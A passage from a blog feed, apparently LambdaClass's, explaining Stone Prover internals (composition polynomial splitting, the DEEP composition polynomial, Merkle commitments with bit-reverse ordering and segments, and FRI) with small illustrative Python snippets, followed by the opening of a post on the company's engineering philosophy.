&lt;code&gt;Air::ConstraintsEval&lt;&#x2F;code&gt; to compute a single evaluation at a point of the LDE. This is the method where the computation is ultimately done.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;breaking-the-composition-polynomial&quot;&gt;Breaking the composition polynomial&lt;&#x2F;h3&gt;
&lt;p&gt;The composition polynomial $H$ is always broken into $d = \deg(H) &#x2F; 2^n$ parts, where $2^n$ is the trace length,&lt;&#x2F;p&gt;
&lt;p&gt;$$H = H_0 ( X^d ) + X H_1 ( X^d ) + \cdots + X^{ d - 1 } H_{ d - 1 }( X^d ).$$&lt;&#x2F;p&gt;
&lt;p&gt;To do so, after computing the evaluation of $H$, one way to calculate each $H_i$ would be to interpolate $H$ and then split its coefficients in the monomial basis. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;composition_polynomial&#x2F;breaker.cc#L64-L66&quot;&gt;The approach&lt;&#x2F;a&gt; in the Stone Prover is an optimization of this. Instead of running a full IFFT to interpolate $H$, it runs only $\log(d)$ steps of the IFFT, which yields the evaluations of each $H_i$ when $d$ is a power of two.&lt;&#x2F;p&gt;
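The decomposition can be checked directly with a toy polynomial in coefficient form (the prime $p = 17$ and the coefficients below are assumptions for illustration; Stone works on evaluations with partial IFFT steps rather than explicit coefficients):

```python
# Toy check of the decomposition: split a polynomial's coefficients into d
# interleaved parts H_i and verify H(x) = sum_i x^i * H_i(x^d) over F_17.
p = 17
H = [5, 1, 4, 2, 9, 7, 3, 6]  # coefficients of H, constant term first
d = 2                          # number of parts

parts = [H[i::d] for i in range(d)]  # H_i takes every d-th coefficient

def evaluate(coeffs, x):
    # Horner evaluation modulo p.
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % p
    return acc

for x in range(1, p):
    lhs = evaluate(H, x)
    rhs = sum(pow(x, i, p) * evaluate(parts[i], pow(x, d, p))
              for i in range(d)) % p
    assert lhs == rhs
```

Writing each exponent as $j = qd + i$ shows why taking every $d$-th coefficient works: the terms with exponent congruent to $i$ modulo $d$ are exactly $x^i H_i(x^d)$.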
&lt;h2 id=&quot;deep-composition-polynomial&quot;&gt;DEEP composition polynomial&lt;&#x2F;h2&gt;
&lt;p&gt;One strange design choice is reusing the AIR and composition polynomial machinery to build the &lt;strong&gt;DEEP&lt;&#x2F;strong&gt; composition polynomial. The DEEP composition polynomial is treated as the composition polynomial of a particular AIR, called &lt;code&gt;BoundaryAIR&lt;&#x2F;code&gt; (see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;stark.cc#L349-L370&quot;&gt;here&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;air&#x2F;boundary&#x2F;boundary_air.h#L34&quot;&gt;here&lt;&#x2F;a&gt;). It has nothing to do with boundary constraints; it is only used for building the DEEP composition polynomial. The same class is used regardless of whether FibonacciAIR, CpuAir, or any other AIR arithmetizes the program being proven. The DEEP composition polynomial is called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;stark.cc#L450&quot;&gt;&lt;code&gt;oods_composition_oracle&lt;&#x2F;code&gt;&lt;&#x2F;a&gt; in the main &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;stark.cc#L383&quot;&gt;&lt;code&gt;ProveStark&lt;&#x2F;code&gt;&lt;&#x2F;a&gt; method.&lt;&#x2F;p&gt;
&lt;p&gt;A side effect of this is cluttering the annotations. It looks as if the verifier chooses the challenge used for building the composition polynomial twice:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;V-&amp;gt;P: &#x2F;STARK&#x2F;Out Of Domain Sampling: Constraint polynomial random element&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;V-&amp;gt;P: &#x2F;STARK&#x2F;Out Of Domain Sampling: Constraint polynomial random element&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first time refers to the challenge of the composition polynomial. The second time refers to the challenge to build the DEEP composition polynomial.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;commitment-scheme&quot;&gt;Commitment Scheme&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Here&amp;#39;s](https:&#x2F;&#x2F;gist.github.com&#x2F;ajgara&#x2F;c9ef34a8b2af614db026dc56c929509b) an example Python code.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The commitment algorithm is simple at its core, but many classes interact with each other to produce a commitment. Also, there are settings and other factors that can change the way the commitment is made. For example, the trace evaluated at the LDE may not fit into RAM due to its size, changing the commitment strategy. Let’s first analyze the core algorithm, assuming the LDE fits in RAM and no special settings are used.&lt;&#x2F;p&gt;
&lt;p&gt;The strategy here is to build a Merkle tree. To produce this Merkle tree, we need to know how to make the leaves of the tree and how to merge two nodes into a node for the next layer.&lt;&#x2F;p&gt;
&lt;p&gt;Suppose we want to commit the following trace:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Evaluations of column 1 on LDE&lt;&#x2F;th&gt;&lt;th&gt;Evaluations of column 2 on LDE&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^0 g^0 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^0 g^0 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^0 g^1 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^0 g^1 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^0 g^2 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^0 g^2 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^0 g^3 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^0 g^3 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^1 g^0 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^1 g^0 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^1 g^1 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^1 g^1 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^1 g^2 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^1 g^2 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 ( wh^1 g^3 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 ( wh^1 g^3 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;We refer to the Domains section for details about domains and cosets. The whole LDE domain is shifted by $w$, the powers of $h$ indicate which coset the value sits in, and the powers of $g$ indicate the index inside that coset. Before committing to the trace, the Stone Prover permutes the order of the rows.&lt;&#x2F;p&gt;
&lt;p&gt;First, the cosets are permuted following &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Bit-reversal_permutation&quot;&gt;bit reverse order&lt;&#x2F;a&gt;. For example, if we had:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;| coset 1 | coset 2 | coset 3 | coset 4 |&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Applying the bit reverse permutation:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;| coset 1 | coset 3 | coset 2 | coset 4 |&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then, the bit reverse order is applied again but inside each coset separately. The final permuted trace would look like this:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Evaluations of column 1 on LDE&lt;&#x2F;th&gt;&lt;th&gt;Evaluations of column 2 on LDE&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^0 g^0 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^0 g^0 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^0 g^2 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^0 g^2 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^0 g^1 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^0 g^1 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^0 g^3 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^0 g^3 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^1 g^0 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^1 g^0 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^1 g^2 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^1 g^2 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^1 g^1 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^1 g^1 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$t_0 (wh^1 g^3 )$&lt;&#x2F;td&gt;&lt;td&gt;$t_1 (wh^1 g^3 )$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;In this case, we only have two cosets, so applying the bit reverse order does nothing, and the two cosets stay in the same place. Then, the elements inside each coset are reordered. Now that we have the correct order, we can start building the leaves of the Merkle tree.&lt;&#x2F;p&gt;
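The two-level reordering can be sketched in a few lines of Python (a minimal illustration; the four-coset layout mirrors the earlier example rather than the two-coset table):

```python
# Two-level bit-reversal reordering: first the cosets are bit-reversed,
# then the rows inside each coset.
def bit_reverse(i: int, bits: int) -> int:
    # Reverse the lowest `bits` bits of i.
    out = 0
    for _ in range(bits):
        out = (out << 1) | (i & 1)
        i >>= 1
    return out

def bit_reverse_permute(items):
    bits = len(items).bit_length() - 1  # len(items) must be a power of two
    return [items[bit_reverse(i, bits)] for i in range(len(items))]

cosets = [["c1r0", "c1r1", "c1r2", "c1r3"], ["c2r0", "c2r1", "c2r2", "c2r3"],
          ["c3r0", "c3r1", "c3r2", "c3r3"], ["c4r0", "c4r1", "c4r2", "c4r3"]]

reordered = [bit_reverse_permute(c) for c in bit_reverse_permute(cosets)]
# The cosets end up in order 1, 3, 2, 4 and each coset reads r0, r2, r1, r3.
```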
&lt;p&gt;Each leaf corresponds to one row. This is because each time the prover opens $t_i(z)$, it also opens all the other columns $t_j(z)$ at the same value $z$, so it makes sense to store them in the same leaf and use the same authentication path for them.&lt;&#x2F;p&gt;
&lt;p&gt;If each column has $|LDE|$ rows, we’ll have $|LDE|$ leaves, each with its hash. The $i$-th leaf is the hash of the concatenation of all the columns at the $i$-th row. So, for example, the first leaf in this case is $H( t_0 (w h^0 g^0 ) || t_1 ( w h^0 g^0 ))$.&lt;&#x2F;p&gt;
&lt;p&gt;Note that the Stone Prover stores its field elements in Montgomery form to enhance the performance of its operations. When the bytes of a field element are hashed, the field element stays in Montgomery form (it is not converted back to the standard representation). Also, the limbs representing the field element are stored from least significant at position 0 to most significant at the end.&lt;&#x2F;p&gt;
&lt;p&gt;Now that we have the leaves, our first layer of the tree, we can build the next layer by merging nodes. To do this, the Stone Prover concatenates the hashes of two consecutive nodes and hashes the result to obtain the parent node. Repeating this operation halves the number of nodes at each step until the Merkle tree is complete.&lt;&#x2F;p&gt;
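The row-wise commitment just described can be sketched as follows (SHA3-256 from the standard library stands in for the configurable hash, and the 32-byte little-endian row values are illustrative assumptions):

```python
# Minimal sketch of the row-wise Merkle commitment described above.
import hashlib

def H(data: bytes) -> bytes:
    return hashlib.sha3_256(data).digest()

def commit(rows):
    # Each leaf hashes the concatenation of all column values in one row.
    layer = [H(b"".join(row)) for row in rows]
    while len(layer) > 1:
        # Merge consecutive nodes by hashing the concatenation of their hashes.
        layer = [H(layer[i] + layer[i + 1]) for i in range(0, len(layer), 2)]
    return layer[0]  # Merkle root

# 8 rows, 2 columns, 32-byte "field elements" (limbs least significant first).
rows = [[i.to_bytes(32, "little"), (i + 1).to_bytes(32, "little")]
        for i in range(8)]
root = commit(rows)
```

An opening of row $i$ then consists of the row's column values plus the sibling hashes along the path from leaf $i$ to the root.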
&lt;p&gt;For a simple example, check out the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gist.github.com&#x2F;ajgara&#x2F;c9ef34a8b2af614db026dc56c929509b&quot;&gt;python code&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Check out the Fibonacci &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gist.github.com&#x2F;schouhy&#x2F;216f5de449481701d36ab99df86bc081#file-fibonacci_stone_prover-cc-L136-L144&quot;&gt;example&lt;&#x2F;a&gt; to see how to instantiate the classes relevant to commitments.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;tableprover&quot;&gt;TableProver&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;code&gt;TableProver&lt;&#x2F;code&gt; abstract class and its implementation &lt;code&gt;TableProverImpl&lt;&#x2F;code&gt; are high-level interfaces for dealing with commitments and decommitments of 2-dimensional arrays of field elements. It consists mainly of a commitment scheme but also has a pointer to a ProverChannel to send and receive elements from the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;There is a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;table_prover.h#L102-L109&quot;&gt;TableProverFactory&lt;&#x2F;a&gt; and a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;utils.inl#L26-L30&quot;&gt;utils function&lt;&#x2F;a&gt; to instantiate it. There’s also a helper used in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;stark&#x2F;stark_test.cc#L64-L72&quot;&gt;tests&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;code&gt;TableProverImpl&lt;&#x2F;code&gt; has a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;table_prover_impl.cc#L117&quot;&gt;&lt;code&gt;Commit&lt;&#x2F;code&gt;&lt;&#x2F;a&gt; method that in turn calls the &lt;code&gt;Commit&lt;&#x2F;code&gt; method of its &lt;code&gt;commitment_scheme_&lt;&#x2F;code&gt; member, which is a pointer to a &lt;code&gt;CommitmentSchemeProver&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;commitmentschemeprover&quot;&gt;CommitmentSchemeProver&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;commitment_scheme.h#L67&quot;&gt;This class&lt;&#x2F;a&gt; implements the logic of the commitment scheme.&lt;&#x2F;p&gt;
&lt;p&gt;There is a commitment scheme &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;commitment_scheme_builder.inl#L177-L195&quot;&gt;builder&lt;&#x2F;a&gt; that calls another method &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;commitment_scheme_builder.inl#L56-L70&quot;&gt;here&lt;&#x2F;a&gt; that constructs a &lt;code&gt;CommitmentSchemeProver&lt;&#x2F;code&gt; by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;commitment_scheme_builder.inl#L106-L124&quot;&gt;alternately calling&lt;&#x2F;a&gt; &lt;code&gt;PackagingCommitmentSchemeProver&lt;&#x2F;code&gt; and &lt;code&gt;CachingCommitmentSchemeProver&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;segments&quot;&gt;Segments&lt;&#x2F;h4&gt;
&lt;p&gt;There are several details to consider when dealing with traces or LDEs that are so large they do not fit into RAM.&lt;&#x2F;p&gt;
&lt;p&gt;Evaluations of a polynomial over the LDE are split into segments. Each segment contains a contiguous subset of the rows. One Merkle tree is built for each segment. Then another Merkle tree is built on top, whose leaves are the roots of the segment trees.&lt;&#x2F;p&gt;
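A minimal sketch of this two-level commitment in Python, using SHA-256 (the hash choice and the helper names `merkle_root` and `segmented_commitment` are our illustrative assumptions, not Stone’s actual configuration):

```python
import hashlib

def merkle_root(leaves):
    # Hash the leaves, then repeatedly hash adjacent pairs until one
    # root remains. Assumes a power-of-two number of leaves.
    layer = [hashlib.sha256(x).digest() for x in leaves]
    while len(layer) > 1:
        layer = [hashlib.sha256(layer[i] + layer[i + 1]).digest()
                 for i in range(0, len(layer), 2)]
    return layer[0]

def segmented_commitment(rows, n_segments):
    # Split the rows into contiguous segments, build one Merkle tree
    # per segment, then commit to the segment roots with a top tree.
    seg_len = len(rows) // n_segments
    segment_roots = [merkle_root(rows[i * seg_len:(i + 1) * seg_len])
                     for i in range(n_segments)]
    return merkle_root(segment_roots)
```

Only the top root needs to be kept in memory while segments are processed one at a time, which is the point of the scheme for traces that do not fit into RAM.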
&lt;p&gt;Two code comments help in understanding this: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;commitment_scheme.h#L47-L55&quot;&gt;here&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;commitment_scheme_builder.inl#L63-L65&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;cachingcommitmentschemeprover&quot;&gt;CachingCommitmentSchemeProver&lt;&#x2F;h3&gt;
&lt;p&gt;The prover may want to store the entire MerkleTree once it’s committed so that when openings are performed, there’s no need to recalculate them. However, if this is too memory-consuming, the prover might choose not to store it and recalculate it later on. The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;3d5bb8bd991b7809a6d379c123c902667bac600f&#x2F;src&#x2F;starkware&#x2F;commitment_scheme&#x2F;caching_commitment_scheme.h#L31-L40&quot;&gt;CachingCommitmentSchemeProver&lt;&#x2F;a&gt; implements this logic.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;packagingcommitmentschemeprover&quot;&gt;PackagingCommitmentSchemeProver&lt;&#x2F;h3&gt;
&lt;p&gt;This class wraps an inner commitment scheme: it groups the data into packages and passes them to the inner scheme.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fri&quot;&gt;FRI&lt;&#x2F;h2&gt;
&lt;p&gt;The FRI part is responsible for generating the FRILayers, generating the query points, and producing the proof. The proof consists of several elements from the Merkle trees from every layer, plus inclusion proofs (authentication paths).&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;blob&#x2F;main&#x2F;src&#x2F;starkware&#x2F;fri&#x2F;fri_folder.h&quot;&gt;FriFolder&lt;&#x2F;a&gt; takes two evaluations from the previous layer and computes an evaluation of the current layer using the &lt;code&gt;FriFolderBase&lt;&#x2F;code&gt; class. The FRI protocol allows one to commit to only a subset of the layers (for example, every second layer). The number of layers between commitments can also vary, but this makes the logic more complicated; this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-libs&#x2F;stone-prover&#x2F;issues&#x2F;4&quot;&gt;issue&lt;&#x2F;a&gt; recommends committing to every third layer. However, the FRI step vector makes it harder for a new user to work with the prover, and we don’t believe it offers a particular advantage in performance.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol distinguishes between data and integrity queries; if an evaluation is part of the integrity queries, it is not supplied as part of the proof. This is because the integrity query can be deduced from elements from the previous layers. We don’t need to check the value directly; if we correctly computed the value, the inclusion proof should pass. More concretely, if the prover sends the values corresponding to $p_k ( x_i )$ and $p_k ( - x_i )$, the verifier can compute $p_{ k + 1 }( x_i^2 )$. This value is needed to check the inclusion proof in the Merkle tree; if we use a wrong value, the validation should fail (unless there is a collision for the hash function).&lt;&#x2F;p&gt;
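The folding step the verifier reproduces can be sketched over a toy prime field (this illustrates the standard FRI fold with an assumed helper `fold`; Stone uses a much larger field and its own field arithmetic):

```python
P = 17  # toy prime; a real deployment uses a cryptographically large field

def fold(y_pos, y_neg, x, beta, p=P):
    # Split f into even and odd parts: f(X) = f_e(X^2) + X * f_o(X^2).
    # From y_pos = f(x) and y_neg = f(-x) we recover both parts at x^2,
    # then combine them with the verifier challenge beta:
    #   g(x^2) = f_e(x^2) + beta * f_o(x^2)
    inv2 = pow(2, p - 2, p)   # inverse of 2 mod p via Fermat's little theorem
    inv_x = pow(x, p - 2, p)  # inverse of x mod p
    f_even = (y_pos + y_neg) * inv2 % p
    f_odd = (y_pos - y_neg) * inv2 % p * inv_x % p
    return (f_even + beta * f_odd) % p
```

Because the verifier derives the next-layer value itself, the prover never sends it: a wrong derived value makes the Merkle inclusion check on the next layer fail.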
&lt;p&gt;The protocol finishes when the size of a layer is smaller than a threshold value; the prover supplies the polynomial representing those evaluations by performing an interpolation over those values. This optimization reduces the proof length, as we avoid sending several values from many Merkle trees and their authentication paths.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol is optimized for proof size since it avoids sending unnecessary information from the integrity queries, the pairs of values are grouped in the same branch in the Merkle tree, and the protocol finishes before reaching degree zero.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered different components of the Stone prover, how they work, and some of their consequences for proof size. Starkware has done a great job developing the prover and open-sourcing it. There are a few parts that still need improvement, but that is always the case with software.&lt;&#x2F;p&gt;
&lt;p&gt;We are currently working towards achieving compatibility between Stone and STARK Platinum. To reach this goal, we need to adapt different parts so that the challenges we generate are the same and the proof we get (from sampling the queries) and its serialization and deserialization are precisely the same. We will continue explaining how the Stone Prover works and the optimizations we are adding to STARK Platinum to enhance its performance while maintaining compatibility.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Lambda’s engineering philosophy</title>
          <pubDate>Wed, 27 Sep 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-engineering-philosophy/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-engineering-philosophy/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-engineering-philosophy/">&lt;h2 id=&quot;what-makes-lambda-different&quot;&gt;What makes Lambda different&lt;&#x2F;h2&gt;
&lt;p&gt;We often hear that Lambda has a different way of operating compared with other companies. Many people we’ve worked with have praised the speed and quality of our delivery. We attribute that to a set of principles that anyone can apply and that might benefit others. It can be summed up as: observe, iterate, simplify, have a close relationship with your code in both its static and dynamic forms, and incorporate process at the correct times to serve the needs of engineering, not management. Let’s break this down:&lt;&#x2F;p&gt;
&lt;h2 id=&quot;be-curious-be-attached-to-learning-and-solving&quot;&gt;Be curious, be attached to learning and solving&lt;&#x2F;h2&gt;
&lt;p&gt;We promote a culture where engineers can feel the joy of putting things into production and applying their skills to interesting challenges.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;observe-and-measure&quot;&gt;Observe and Measure&lt;&#x2F;h2&gt;
&lt;p&gt;Engineering is applying knowledge to solve problems under a given cost&#x2F;benefit tradeoff. You cannot solve a problem you cannot see. Seeing is measuring. Use your tools to diagnose the problem, have a metric for success, then measure again after applying your solution.&lt;&#x2F;p&gt;
&lt;p&gt;Build observability into your system. The sooner you see, the sooner you can react, to both changing requirements and changing metrics.&lt;&#x2F;p&gt;
&lt;p&gt;This also applies to performance engineering. Optimization is premature (thus evil) only when it occurs before it is a requirement and before measuring.&lt;&#x2F;p&gt;
&lt;p&gt;Iterate frequently in your perceive-act loop to shorten feedback.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;speak-openly-about-engineering-problems&quot;&gt;Speak openly about engineering problems&lt;&#x2F;h2&gt;
